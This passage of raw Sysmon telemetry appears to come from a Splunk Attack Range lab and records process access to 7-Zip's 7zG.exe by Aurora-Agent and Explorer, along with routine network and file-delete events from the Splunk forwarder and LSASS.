Files\Aurora-Agent\aurora-agent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000040098Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:54.074{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CFC22762BF80F8BEB11285BC7FAE0336,SHA256=946171D28E3E43B00AD2C177DCCBC328819BC258A9A3DF0ED0FD1566865DDE75,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015369Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:55.929{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C1778FC3E27FE703CF14CF14262009B,SHA256=52178C0C864437C93D2A30FB921A3FA6CF8C92CA169D4BD37B418E7784112020,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000015368Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:54.075{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50047-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000040164Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:55.920{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=641CB6545C95502FB111D5546FEC79EF,SHA256=7C77E956798E83B56F07A177CE2EE5A4BB0E1D4C5B303D96700C12B4B4950B40,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000040163Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:55.861{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000040162Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:55.860{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000040161Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:55.860{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000040160Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:55.837{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000040159Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:55.837{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000040158Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:55.837{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 23542300x800000000000000040157Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:55.837{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=85540E9AF3025EA269B95D1E0805C3A2,SHA256=36A163162819E3442E81C4077AD45406B1B7B699D1052018C638E4C416A9676F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000040156Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:53.578{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56236-false10.0.1.12-8000- 23542300x800000000000000040155Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:55.224{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9E8C403FF83256ED8FEEC5C5005A1AD,SHA256=C2D92B28A675EDA123B3E2A5B58A4331CA98D51B0DBEB92C477784F669DF62FA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000040154Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:55.114{FE4C2B44-DDF7-63C7-B604-00000000AF02}37882252C:\Windows\system32\taskhostw.exe{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d742|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040153Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:55.068{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005288C:\Windows\Explorer.EXE{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8a4a5|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040152Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:55.068{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005288C:\Windows\Explorer.EXE{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8a3be|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040151Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:55.068{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005288C:\Windows\Explorer.EXE{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8a387|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040150Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:55.068{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8a4a5|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c437|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040149Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:55.068{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8a3be|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c437|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040148Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:55.068{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8a387|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c437|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040147Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:55.052{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c437|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040146Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:55.052{FE4C2B44-DDF7-63C7-B604-00000000AF02}37882252C:\Windows\system32\taskhostw.exe{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d742|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040145Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:55.052{FE4C2B44-DDF7-63C7-B604-00000000AF02}37882252C:\Windows\system32\taskhostw.exe{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d742|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040144Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:55.036{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8ab30|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040143Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:55.036{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+1078f0|C:\Windows\System32\SHELL32.dll+8aaec|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040142Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:55.036{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8aac0|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040141Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:55.036{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\TwinUI.dll+12ccb9|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040170Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:56.863{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000040169Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:56.863{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000040168Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:56.863{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 354300x800000000000000040167Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:54.302{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local56237-true0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local389ldap 354300x800000000000000040166Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:54.302{FE4C2B44-DA03-63C7-1F00-00000000AF02}2444C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local56237-true0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local389ldap 23542300x800000000000000040165Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:56.206{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12E1F92513BAD71FAA1B0D7EB1A37995,SHA256=7BEDD49CB7658498DFB3C7FD518A1040CA0E5C0E652590F13D54DBF5096A0D1E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000040174Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:57.848{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005288C:\Windows\Explorer.EXE{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8a4a5|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040173Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:57.848{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005288C:\Windows\Explorer.EXE{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8a3be|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040172Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:57.848{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005288C:\Windows\Explorer.EXE{FE4C2B44-E372-63C7-0806-00000000AF02}6964C:\Program 